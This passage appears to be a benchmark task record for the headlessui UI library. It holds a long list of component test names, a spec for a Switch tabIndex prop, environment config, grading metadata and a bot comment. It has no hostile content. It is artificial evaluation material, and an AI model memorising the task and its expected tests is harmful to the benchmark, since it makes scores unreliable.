no-op", "should be possible to click a menu item, which closes the menu", "should be possible to click a menu item, which closes the menu and invokes the @click handler", "should be possible to click a disabled menu item, which is a no-op", "should be possible focus a menu item, so that it becomes active", "should not be possible to focus a menu item which is disabled", "should not be possible to activate a disabled item", "should error when we are using a <DialogOverlay /> without a parent <Dialog />", "should error when we are using a <DialogTitle /> without a parent <Dialog />", "should error when we are using a <DialogBackdrop /> without a parent <Dialog />", "should error when we are using a <DialogPanel /> without a parent <Dialog />", "should be possible to render a Dialog without crashing", "should be possible to access the ref on the DialogBackdrop", "should be possible to access the ref on the DialogPanel", "should complain when an `open` prop is missing", "should be able to explicitly choose role=dialog", "should be able to explicitly choose role=alertdialog", "should fall back to role=dialog for an invalid role", "should complain when an `open` prop is not a boolean", "should be possible to render a Dialog using a render prop", "should be possible to pass props to the Dialog itself", "should be possible to always render the Dialog if we provide it a `static` prop (and enable focus trapping based on `open`)", "should be possible to always render the Dialog if we provide it a `static` prop (and disable focus trapping based on `open`)", "should be possible to use a different render strategy for the Dialog", "should add a scroll lock to the html tag", "should wait to add a scroll lock to the html tag when unmount is false in a Transition", "scroll locking should work when transitioning between dialogs", "should remove the scroll lock when the open closed state is `Closing`", "should not have a scroll lock when the transition marked as not shown", "should be possible to render DialogOverlay using a render prop", "should throw an error if a DialogBackdrop is used without a DialogPanel", "should not throw an error if a DialogBackdrop is used with a DialogPanel", "should portal the DialogBackdrop", "should be possible to render DialogTitle using a render prop", "should be possible to render DialogDescription using a render prop", "should be possible to open a dialog from inside a Popover (and then close it)", "should be possible to open the Dialog via a Transition component", "should be possible to close the Dialog via a Transition component", "should be possible to close the dialog with Escape", "should be possible to close the dialog with Escape, when a field is focused", "should not be possible to close the dialog with Escape, when a field is focused but cancels the event", "should be possible to tab around when using the initialFocus ref", "should be possible to tab around when using the initialFocus ref on a component", "should not escape the FocusTrap when there is only 1 focusable element (going forwards)", "should not escape the FocusTrap when there is only 1 focusable element (going backwards)", "should be possible to close a Dialog using a click on the DialogOverlay", "should not close the Dialog when clicking on contents of the Dialog.Overlay", "should be possible to close the dialog, and re-focus the button when we click outside on the body element", "should be possible to close the dialog, and keep focus on the focusable element", "should stop propagating click events when clicking on the Dialog.Overlay", "should be possible to submit a form inside a Dialog", "should stop propagating click events when clicking on an element inside the Dialog", "should should be possible to click on removed elements without closing the Dialog", "should be possible to click on elements created by third party libraries", "should be possible to focus elements created by third party libraries", "should be possible to click elements inside the dialog when they reside inside a shadow boundary", "should close the Dialog if we click outside the DialogPanel", "should not close the Dialog if we click inside the DialogPanel", "should not close the dialog if opened during mouse up", "should not close the dialog if click starts inside the dialog but ends outside", "should be possible to open nested Dialog components and close them with `Escape`", "should be possible to open nested Dialog components and close them with `Outside Click`", "should be possible to open nested Dialog components and close them with `Click on Dialog.Overlay`", "should error when we are using a <Menu.Button /> without a parent <Menu />", "should error when we are using a <Menu.Items /> without a parent <Menu />", "should error when we are using a <Menu.Item /> without a parent <Menu />", "should be possible to render a Menu using a render prop", "should be possible to render a Menu.Button using a render prop", "should be possible to render a Menu.Button using a render prop and an `as` prop", "should be possible to render Menu.Items using a render prop", "should be possible to always render the Menu.Items if we provide it a `static` prop", "should be possible to use a different render strategy for the Menu.Items", "should be possible to render a Menu.Item using a render prop", "should be possible to conditionally render classNames (aka className can be a function?!)", "should be possible to wrap the Menu.Items with a Transition component", "should be possible to wrap the Menu.Items with a Transition.Child component", "should close when we use Tab", "should focus trap when we use Shift+Tab", "should not be possible to open the menu with ArrowUp and the last item should be active when the button is disabled", "should be possible to click outside of the menu, on an element which is within a focusable element, which closes the menu", "should error when we are using a <Dialog.Overlay /> without a parent <Dialog />", "should error when we are using a <Dialog.Title /> without a parent <Dialog />", "should error when we are using a <Dialog.Backdrop /> without a parent <Dialog />", "should error when we are using a <Dialog.Panel /> without a parent <Dialog />", "should complain when the `open` and `onClose` prop are missing", "should complain when an `open` prop is provided without an `onClose` prop", "should complain when an `onClose` prop is provided without an `open` prop", "should complain when an `onClose` prop is not a function", "should be possible to render Dialog.Overlay using a render prop", "should throw an error if a Dialog.Backdrop is used without a Dialog.Panel", "should not throw an error if a Dialog.Backdrop is used with a Dialog.Panel", "should portal the Dialog.Backdrop", "should be possible to render Dialog.Title using a render prop", "should be possible to render Dialog.Description using a render prop", "should be possible to close a Dialog using a click on the Dialog.Overlay", "should not close the Dialog if it starts open and we click inside the Dialog when it has only a panel", "should close the Dialog if we click outside the Dialog.Panel", "should not close the Dialog if we click inside the Dialog.Panel", "should be possible to open nested Dialog components (visible when mounted) and close them with `Escape`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Outside Click`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Click on Dialog.Overlay`", "should be possible to open nested Dialog components (visible when always) and close them with `Escape`", "should be possible to open nested Dialog components (visible when always) and close them with `Outside Click`", "should error when we are using a <Popover.Button /> without a parent <Popover />", "should error when we are using a <Popover.Panel /> without a parent <Popover />", "should error when we are using a <Popover.Overlay /> without a parent <Popover />", "should be possible to render a Popover.Group with multiple Popover components", "should expose a close function that closes the popover and takes an event", "should be possible to get a ref to the Popover", "should be possible to use a Fragment with an optional ref", "should be possible to render a Popover.Button using a fragment", "should be possible to render a Popover.Button using a render prop", "should be possible to render a Popover.Button using a render prop and an `as` prop", "should be possible to render Popover.Panel using a render prop", "should be possible to always render the Popover.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Popover.Panel", "should close the Popover, when Popover.Panel has the focus prop and you focus the open button", "should warn when you are using multiple `Popover.Button` components", "should warn when you are using multiple `Popover.Button` components (wrapped in a Transition)", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel`", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel` (wrapped in a Transition)", "should warn when you are using multiple `Popover.Button` components in a nested `Popover`", "should not warn when you are using multiple `Popover.Button` components in a nested `Popover.Panel`", "should be possible to wrap the Popover.Panel with a Transition component", "should close the Popover by pressing `Enter` on a Popover.Button inside a Popover.Panel", "should close the Popover menu, when pressing escape on the Popover.Button", "should close the Popover menu, when pressing escape on the Popover.Panel", "should be possible to close a sibling Popover when pressing escape on a sibling Popover.Button", "should be possible to Tab through the panel contents onto the next Popover.Button", "should be possible to place a focusable item in the Popover.Group, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the Popover.Group", "should close the Popover when the Popover.Panel has a focus prop", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal)", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal), and focus the next focusable item in line", "should focus the previous Popover.Button when Shift+Tab on the second Popover.Button", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (inside a Portal)", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button (using Portal's)", "should close the Popover by pressing `Space` on a Popover.Button inside a Popover.Panel", "should close the Popover by pressing `Enter` on a Popover.Button and go to the href of the `a` inside a Popover.Panel", "should be possible to close a Popover using a click on the Popover.Overlay", "should be possible to close the Popover by clicking on a Popover.Button inside a Popover.Panel", "should not close the Popover when clicking on a focusable element inside a static Popover.Panel", "should not close the Popover when clicking on a non-focusable element inside a static Popover.Panel", "should close the Popover when clicking outside of a static Popover.Panel", "should trigger the `change` when the tab changes", "should error when we are using a <TabList /> without a parent <TabGroup /> component", "should error when we are using a <Tab /> without a parent <TabGroup /> component", "should error when we are using a <TabPanels /> without a parent <TabGroup /> component", "should error when we are using a <TabPanel /> without a parent <TabGroup /> component", "should be possible to render TabGroup without crashing", "should be possible to render the TabPanels first, then the TabList", "should guarantee the order when injecting new tabs dynamically", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (controlled component)", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (uncontrolled component)", "should expose the `selectedIndex` on the `Tabs` component", "should expose the `selectedIndex` on the `TabList` component", "should expose the `selectedIndex` on the `TabPanels` component", "should expose the `selected` state on the `Tab` components", "should expose the `selected` state on the `TabPanel` components", "should jump to the nearest tab when the defaultIndex is out of bounds (-2)", "should jump to the nearest tab when the defaultIndex is out of bounds (+5)", "should jump to the next available tab when the defaultIndex is a disabled tab", "should jump to the next available tab when the defaultIndex is a disabled tab and wrap around", "should not change the Tab if the defaultIndex changes", "should select first tab if no tabs were provided originally", "should select first tab if no tabs were provided originally (with a defaultIndex of 1)", "should not change the tab in a controlled component if you do not respond to the @change", "should be possible to change active tab controlled and uncontrolled", "should jump to the nearest tab when the selectedIndex is out of bounds (-2)", "should jump to the nearest tab when the selectedIndex is out of bounds (+5)", "should jump to the next available tab when the selectedIndex is a disabled tab", "should jump to the next available tab when the selectedIndex is a disabled tab and wrap around", "should prefer selectedIndex over defaultIndex", "should wrap around when overflowing the index when using a controlled component", "should wrap around when underflowing the index when using a controlled component", "should be possible to tab to the default initial first tab", "should be possible to tab to the default index tab", "should be possible to go to the next item (activation = `auto`)", "should be possible to go to the next item (activation = `manual`)", "should wrap around at the end (activation = `auto`)", "should wrap around at the end (activation = `manual`)", "should not be possible to go right when in vertical mode (activation = `auto`)", "should not be possible to go right when in vertical mode (activation = `manual`)", "should be possible to go to the previous item (activation = `auto`)", "should be possible to go to the previous item (activation = `manual`)", "should wrap around at the beginning (activation = `auto`)", "should wrap around at the beginning (activation = `manual`)", "should not be possible to go left when in vertical mode (activation = `auto`)", "should not be possible to go left when in vertical mode (activation = `manual`)", "should not be possible to go down when in horizontal mode (activation = `auto`)", "should not be possible to go down when in horizontal mode (activation = `manual`)", "should be possible to go to the first focusable item (activation = `auto`)", "should be possible to go to the first focusable item (activation = `manual`)", "should be possible to activate the focused tab", "should be possible to click on a tab to focus it", "should be a no-op when clicking on a disabled tab", "should be possible to go to the next item containing a Dialog component", "should error when we are using a <ListboxButton /> without a parent <Listbox />", "should error when we are using a <ListboxLabel /> without a parent <Listbox />", "should error when we are using a <ListboxOptions /> without a parent <Listbox />", "should error when we are using a <ListboxOption /> without a parent <Listbox />", "should be possible to render a Listbox without crashing", "should be possible to render a Listbox using a render prop", "should be possible to disable a Listbox", "should not crash in multiple mode", "null should be a valid value for the Listbox", "should be possible to use the by prop (as a string) with a null initial value", "should be possible to use the by prop (as a string) with a null listbox option", "should be possible to use completely new objects while rendering (single mode)", "should be possible to use completely new objects while rendering (multiple mode)", "should be possible to render a ListboxLabel using a render prop", "should be possible to render a ListboxLabel using a render prop and an `as` prop", "should be possible to render a ListboxButton using a render prop", "should be possible to render a ListboxButton using a render prop and an `as` prop", "should be possible to render a ListboxButton and a ListboxLabel and see them linked together", "should be possible to render ListboxOptions using a render prop", "should be possible to always render the ListboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ListboxOptions", "should be possible to render a ListboxOption using a render prop", "should expose the value via the render prop", "should be possible to reset to the default value in multiple mode", "should be possible to swap the Listbox option with a button for example", "should always open the ListboxOptions because of a wrapping OpenClosed component", "should always close the ListboxOptions because of a wrapping OpenClosed component", "should be possible to open the listbox with Enter", "should not be possible to open the listbox with Enter when the button is disabled", "should be possible to open the listbox with Enter, and focus the selected option", "should be possible to open the listbox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the listbox with Enter, and focus the selected option (with a list of objects)", "should have no active listbox option when there are no listbox options at all", "should focus the first non disabled listbox option when opening with Enter", "should focus the first non disabled listbox option when opening with Enter (jump over multiple disabled ones)", "should have no active listbox option upon Enter key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Enter when there is no active listboxoption", "should be possible to close the listbox with Enter and choose the active listbox option", "should be possible to open the listbox with Space", "should not be possible to open the listbox with Space when the button is disabled", "should be possible to open the listbox with Space, and focus the selected option", "should focus the first non disabled listbox option when opening with Space", "should focus the first non disabled listbox option when opening with Space (jump over multiple disabled ones)", "should have no active listbox option upon Space key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Space and choose the active listbox option", "should be possible to close an open listbox with Escape", "should focus trap when we use Tab", "should be possible to open the listbox with ArrowDown", "should not be possible to open the listbox with ArrowDown when the button is disabled", "should be possible to open the listbox with ArrowDown, and focus the selected option", "should be possible to use ArrowDown to navigate the listbox options", "should be possible to use ArrowDown to navigate the listbox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the listbox options and jump to the first non-disabled one", "should be possible to use ArrowRight to navigate the listbox options", "should be possible to open the listbox with ArrowUp and the last option should be active", "should not be possible to open the listbox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the listbox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the listbox options and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled option", "should be possible to use ArrowUp to navigate the listbox options", "should be possible to use ArrowLeft to navigate the listbox options", "should be possible to use the End key to go to the last listbox option", "should be possible to use the End key to go to the last non disabled listbox option", "should be possible to use the End key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon End key press, when there are no non-disabled listbox options", "should be possible to use the PageDown key to go to the last listbox option", "should be possible to use the PageDown key to go to the last non disabled listbox option", "should be possible to use the PageDown key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageDown key press, when there are no non-disabled listbox options", "should be possible to use the Home key to go to the first listbox option", "should be possible to use the Home key to go to the first non disabled listbox option", "should be possible to use the Home key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon Home key press, when there are no non-disabled listbox options", "should be possible to use the PageUp key to go to the first listbox option", "should be possible to use the PageUp key to go to the first non disabled listbox option", "should be possible to use the PageUp key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageUp key press, when there are no non-disabled listbox options", "should not be possible to search for a disabled option", "should focus the ListboxButton when we click the ListboxLabel", "should not focus the ListboxButton when we right click the ListboxLabel", "should be possible to open the listbox on click", "should not be possible to open the listbox on right click", "should not be possible to open the listbox on click when the button is disabled", "should be possible to open the listbox on click, and focus the selected option", "should be possible to close a listbox on click", "should be a no-op when we click outside of a closed listbox", "should be possible to click outside of the listbox which should close the listbox", "should be possible to click outside of the listbox on another listbox button which should close the current listbox and open the new listbox", "should be possible to click outside of the listbox which should close the listbox (even if we press the listbox button)", "should be possible to hover an option and make it active", "should make a listbox option active when you move the mouse over it", "should be a no-op when we move the mouse and the listbox option is already active", "should be a no-op when we move the mouse and the listbox option is disabled", "should not be possible to hover an option that is disabled", "should be possible to mouse leave an option and make it inactive", "should be possible to mouse leave a disabled option and be a no-op", "should be possible to click a listbox option, which closes the listbox", "should be possible to click a disabled listbox option, which is a no-op", "should be possible focus a listbox option, so that it becomes active", "should not be possible to focus a listbox option which is disabled", "should be possible to pass multiple values to the Listbox component", "should make the first selected option the active item", "should keep the listbox open when selecting an item via the keyboard", "should toggle the selected state of an option when clicking on it", "should toggle the selected state of an option when clicking on it (using objects instead of primitives)", "should yell at us when we forget to wrap the `<TransitionChild />` in a parent <Transition /> component", "should be possible to render a TransitionChild without children", "should be possible to change the underlying DOM tag of the TransitionChild components", "should be possible to change the underlying DOM tag of the Transition component and TransitionChild components", "should be possible to use render props on the TransitionChild components", "should be possible to use render props on the Transition and TransitionChild components", "should yell at us when we forgot to forward the ref on one of the TransitionChild components", "should transition out completely", "should fire events for all the stages", "should trigger the `onChange` when the tab changes", "should error when we are using a <Tab.List /> without a parent <Tab.Group /> component", "should error when we are using a <Tab /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panels /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panel /> without a parent <Tab.Group /> component", "should be possible to render Tab.Group without crashing", "should be possible to render the Tab.Panels first, then the Tab.List", "should be possible to render using as={Fragment}", "should be possible to render using multiple as={Fragment}", "should expose the `selectedIndex` on the `Tab.Group` component", "should expose the `selectedIndex` on the `Tab.List` component", "should expose the `selectedIndex` on the `Tab.Panels` component", "should expose the `selected` state on the `Tab.Panel` components", "should not change the tab in a controlled component if you do not respond to the onChange", "should error when we are using a <Listbox.Button /> without a parent <Listbox />", "should error when we are using a <Listbox.Label /> without a parent <Listbox />", "should error when we are using a <Listbox.Options /> without a parent <Listbox />", "should error when we are using a <Listbox.Option /> without a parent <Listbox />", "should be possible to render a Listbox.Label using a render prop", "should be possible to render a Listbox.Label using a render prop and an `as` prop", "should be possible to render a Listbox.Button using a render prop", "should be possible to render a Listbox.Button using a render prop and an `as` prop", "should be possible to render a Listbox.Button and a Listbox.Label and see them linked together", "should be possible to render Listbox.Options using a render prop", "should be possible to always render the Listbox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Listbox.Options", "should be possible to render a Listbox.Option using a render prop", "should be possible to wrap the Listbox.Options with a Transition component", "should focus the Listbox.Button when we click the Listbox.Label", "should not focus the Listbox.Button when we right click the Listbox.Label", "should be possible to click outside of the listbox, on an element which is within a focusable element, which closes the listbox", "should error when we are using a <Combobox.Button /> without a parent <Combobox />", "should error when we are using a <Combobox.Label /> without a parent <Combobox />", "should error when we are using a <Combobox.Options /> without a parent <Combobox />", "should error when we are using a <Combobox.Option /> without a parent <Combobox />", "should be possible to render a Combobox without crashing", "should guarantee the order of options based on `order` when performing actions", "should be possible to render a Combobox using a render prop", "should be possible to disable a Combobox", "should not crash when a defaultValue is not given", "should close the Combobox when the input is blurred", "selecting an option puts the value into Combobox.Input when displayValue is not provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when value is undefined)", "conditionally rendering the input should allow changing the display value", "should be possible to override the `type` on the input", "should move the caret to the end of the input when syncing the value", "should be possible to render a Combobox.Label using a render prop", "should be possible to link Input/Button and Label if Label is rendered last", "should be possible to render a Combobox.Label using a render prop and an `as` prop", "should be possible to render a Combobox.Button using a render prop", "should be possible to render a Combobox.Button using a render prop and an `as` prop", "should be possible to render a Combobox.Button and a Combobox.Label and see them linked together", "should be possible to render Combobox.Options using a render prop", "should be possible to always render the Combobox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Combobox.Options", "should be possible to render a Combobox.Option using a render prop", "should be possible to swap the Combobox option with a button for example", "should mark all the elements between Combobox.Options and Combobox.Option with role none", "should be possible to wrap the Combobox.Options with a Transition component", "should be possible to open the combobox with Enter", "should not be possible to open the combobox with Enter when the button is disabled", "should be possible to open the combobox with Enter, and focus the selected option", "should be possible to open the combobox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the combobox with Enter, and focus the selected option (with a list of objects)", "should have no active combobox option when there are no combobox options at all", "should be possible to open the combobox with Space", "should not be possible to open the combobox with Space when the button is disabled", "should be possible to open the combobox with Space, and focus the selected option", "should have no active combobox option upon Space key press, when there are no non-disabled combobox options", "should be possible to close an open combobox with Escape", "should not propagate the Escape event when the combobox is open", "should propagate the Escape event when the combobox is closed", "should be possible to open the combobox with ArrowDown", "should not be possible to open the combobox with ArrowDown when the button is disabled", "should be possible to open the combobox with ArrowDown, and focus the selected option", "should be possible to open the combobox with ArrowUp and the last option should be active", "should not be possible to open the combobox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the combobox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the combobox options and jump to the first non-disabled one", "should be possible to close the combobox with Enter and choose the active combobox option", "pressing Tab should select the active item and move to the next DOM node", "pressing Shift+Tab should select the active item and move to the previous DOM node", "should bubble escape when using `static` on Combobox.Options", "should bubble escape when not using Combobox.Options at all", "should sync the input field correctly and reset it when pressing Escape", "should be possible to use ArrowDown to navigate the combobox options", "should be possible to use ArrowDown to navigate the combobox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the combobox options and jump to the first non-disabled one", "should be possible to go to the next item if no value is set", "should be possible to use ArrowUp to navigate the combobox options", "should be possible to use the End key to go to the last combobox option", "should be possible to use the End key to go to the last non disabled combobox option", "should be possible to use the End key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon End key press, when there are no non-disabled combobox options", "should be possible to use the PageDown key to go to the last combobox option", "should be possible to use the PageDown key to go to the last non disabled combobox option", "should be possible to use the PageDown key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageDown key press, when there are no non-disabled combobox options", "should be possible to use the Home key to go to the first combobox option", "should be possible to use the Home key to go to the first non disabled combobox option", "should be possible to use the Home key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon Home key press, when there are no non-disabled combobox options", "should be possible to use the PageUp key to go to the first combobox option", "should be possible to use the PageUp key to go to the first non disabled combobox option", "should be possible to use the PageUp key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageUp key press, when there are no non-disabled combobox options", "should reset the value when the last character is removed, when in `nullable` mode", "should not be possible to search and activate a disabled option", "should maintain activeIndex and activeOption when filtering", "should focus the Combobox.Input when we click the Combobox.Label", "should not focus the Combobox.Input when we right click the Combobox.Label", "should be possible to open the combobox by focusing the input with immediate mode enabled", "should not be possible to open the combobox by focusing the input with immediate mode disabled", "should not be possible to open the combobox by focusing the input with immediate mode enabled when button is disabled", "should be possible to close a combobox on click with immediate mode enabled", "should be possible to close a focused combobox on click with immediate mode enabled", "should be possible to open the combobox on click", "should not be possible to open the combobox on right click", "should not be possible to open the combobox on click when the button is disabled", "should be possible to open the combobox on click, and focus the selected option", "should be possible to close a combobox on click", "should be a no-op when we click outside of a closed combobox", "should be possible to click outside of the combobox on another combobox button which should close the current combobox and open the new combobox", "should be possible to click outside of the combobox which should close the combobox (even if we press the combobox button)", "should be possible to click outside of the combobox, on an element which is within a focusable element, which closes the combobox", "should be possible to hover an option and make it active when using `static`", "should make a combobox option active when you move the mouse over it", "should be a no-op when we move the mouse and the combobox option is already active", "should be a no-op when we move the mouse and the combobox option is disabled", "should be possible to click a combobox option, which closes the combobox", "should be possible to click a combobox option, which closes the combobox with immediate mode enabled", "should be possible to click a disabled combobox option, which is a no-op", "should be possible focus a combobox option, so that it becomes active", "should not be possible to focus a combobox option which is disabled", "should be possible to hold the last active option", "should sync the input field correctly and reset it when resetting the value from outside (to null)", "should warn when changing the combobox from uncontrolled to controlled", "should warn when changing the combobox from controlled to uncontrolled", "should sync the input field correctly and reset it when resetting the value from outside (when using displayValue)", "should be possible to pass multiple values to the Combobox component", "should keep the combobox open when selecting an item via the keyboard", "should reset the active option, if the active option gets unmounted", "should error when we are using a <ComboboxButton /> without a parent <Combobox />", "should error when we are using a <ComboboxLabel /> without a parent <Combobox />", "should error when we are using a <ComboboxOptions /> without a parent <Combobox />", "should error when we are using a <ComboboxOption /> without a parent <Combobox />", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when v-model is undefined)", "should be possible to render a ComboboxLabel using a render prop", "should be possible to render a ComboboxLabel using a render prop and an `as` prop", "should be possible to render a ComboboxButton using a render prop", "should be possible to render a ComboboxButton using a render prop and an `as` prop", "should be possible to render a ComboboxButton and a ComboboxLabel and see them linked together", "should be possible to render ComboboxOptions using a render prop", "should be possible to always render the ComboboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ComboboxOptions", "should be possible to render a ComboboxOption using a render prop", "should always open the ComboboxOptions because of a wrapping OpenClosed component", "should always close the ComboboxOptions because of a wrapping OpenClosed component", "should sync the active index properly", "should be possible to open the Combobox with Enter", "should be possible to use the PageDown key to go to the last non disabled Combobox option", "should focus the ComboboxButton when we click the ComboboxLabel", "should not focus the ComboboxInput when we right click the ComboboxLabel", "should sync the input field correctly and reset it when resetting the value from outside (to undefined)" ]
Method: Switch<TTag extends ElementType = typeof DEFAULT_SWITCH_TAG>(props: SwitchProps<TTag> & { tabIndex?: number }) Location: packages/@headlessui-react/src/components/switch/switch.tsx Inputs: - tabIndex?: number – optional numeric prop; defaults to 0. If the caller provides -1 the component coerces it to 0 to keep the element focusable. Outputs: - Renders a button‑like element with `role="switch"` and a `tabindex` attribute whose value is the provided tabIndex (or 0 when omitted or when -1 is supplied). The component remains keyboard‑focusable and integrates with the existing Switch accessibility API. Method: Switch (Vue component) – props object includes `tabIndex?: number` Location: packages/@headlessui-vue/src/components/switch/switch.ts Inputs: - tabIndex?: number – optional numeric prop; default 0. When passed -1 the component treats it as 0. Outputs: - Returns a render function that produces an element with `role="switch"` and a `tabindex` attribute reflecting the effective tabIndex (≥ 0). This prop allows callers to customise tab order while ensuring the switch stays focusable.
MIT
{ "base_image_name": "node_20", "install": [ "npm ci --prefer-offline --no-audit --progress=false" ], "log_parser": "parse_log_js_4", "test_cmd": "npm test -- --verbose --no-colors" }
{ "num_modified_files": 4, "num_modified_lines": 8, "pr_author": "RobinMalfait", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/tailwindlabs/headlessui/pull/2966" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests that the Switch component accept a custom `tabIndex` prop, default to 0, and ignore a value of -1. The added tests check the default, an overridden positive value, and the handling of -1, matching the described behavior. Tests only verify the new prop and do not impose unrelated expectations, and the issue provides clear acceptance criteria, so it is a clean, solvable task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
08baf094d22810e113514dec6bf9a05133353757
2024-02-21 13:08:31
vercel[bot]: [vc]: #XFMtm9bVIaVWoByZM1t5TdWDXTP4a4CGwywr3CEXsxs=:eyJpc01vbm9yZXBvIjp0cnVlLCJ0eXBlIjoiZ2l0aHViIiwicHJvamVjdHMiOlt7Im5hbWUiOiJoZWFkbGVzc3VpLXJlYWN0Iiwicm9vdERpcmVjdG9yeSI6InBsYXlncm91bmRzL3JlYWN0IiwiaW5zcGVjdG9yVXJsIjoiaHR0cHM6Ly92ZXJjZWwuY29tL3RhaWx3aW5kbGFicy9oZWFkbGVzc3VpLXJlYWN0L0ZON2VGMVd0bTE3djc4eHhoWFhFQ1hiZHlTQkYiLCJwcmV2aWV3VXJsIjoiaGVhZGxlc3N1aS1yZWFjdC1naXQtZml4LWlzc3VlLTI5ODgtdGFpbHdpbmRsYWJzLnZlcmNlbC5hcHAiLCJuZXh0Q29tbWl0U3RhdHVzIjoiUEVORElORyIsImxpdmVGZWVkYmFjayI6eyJyZXNvbHZlZCI6MCwidW5yZXNvbHZlZCI6MCwidG90YWwiOjAsImxpbmsiOiJoZWFkbGVzc3VpLXJlYWN0LWdpdC1maXgtaXNzdWUtMjk4OC10YWlsd2luZGxhYnMudmVyY2VsLmFwcCJ9fSx7Im5hbWUiOiJoZWFkbGVzc3VpLXZ1ZSIsInJvb3REaXJlY3RvcnkiOiJwbGF5Z3JvdW5kcy92dWUiLCJpbnNwZWN0b3JVcmwiOiJodHRwczovL3ZlcmNlbC5jb20vdGFpbHdpbmRsYWJzL2hlYWRsZXNzdWktdnVlLzh4M1VOWVFlS3BGa2VHajl5ZktlanlBVzZwRmQiLCJwcmV2aWV3VXJsIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yOTg4LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIiwibmV4dENvbW1pdFN0YXR1cyI6IlBFTkRJTkciLCJsaXZlRmVlZGJhY2siOnsicmVzb2x2ZWQiOjAsInVucmVzb2x2ZWQiOjAsInRvdGFsIjowLCJsaW5rIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yOTg4LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIn19XX0= **The latest updates on your projects**. Learn more about [Vercel for Git ↗︎](https://vercel.link/github-learn-more) | Name | Status | Preview | Comments | Updated (UTC) | | :--- | :----- | :------ | :------- | :------ | | **headlessui-react** | 🔄 Building ([Inspect](https://vercel.com/tailwindlabs/headlessui-react/FN7eF1Wtm17v78xxhXXECXbdySBF)) | [Visit Preview](https://vercel.live/open-feedback/headlessui-react-git-fix-issue-2988-tailwindlabs.vercel.app?via=pr-comment-visit-preview-link&passThrough=1) | 💬 [**Add feedback**](https://vercel.live/open-feedback/headlessui-react-git-fix-issue-2988-tailwindlabs.vercel.app?via=pr-comment-feedback-link) | Feb 21, 2024 1:08pm | | **headlessui-vue** | 🔄 Building ([Inspect](https://vercel.com/tailwindlabs/headlessui-vue/8x3UNYQeKpFkeGj9yfKejyAW6pFd)) | [Visit Preview](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2988-tailwindlabs.vercel.app?via=pr-comment-visit-preview-link&passThrough=1) | 💬 [**Add feedback**](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2988-tailwindlabs.vercel.app?via=pr-comment-feedback-link) | Feb 21, 2024 1:08pm |
tailwindlabs__headlessui-3004
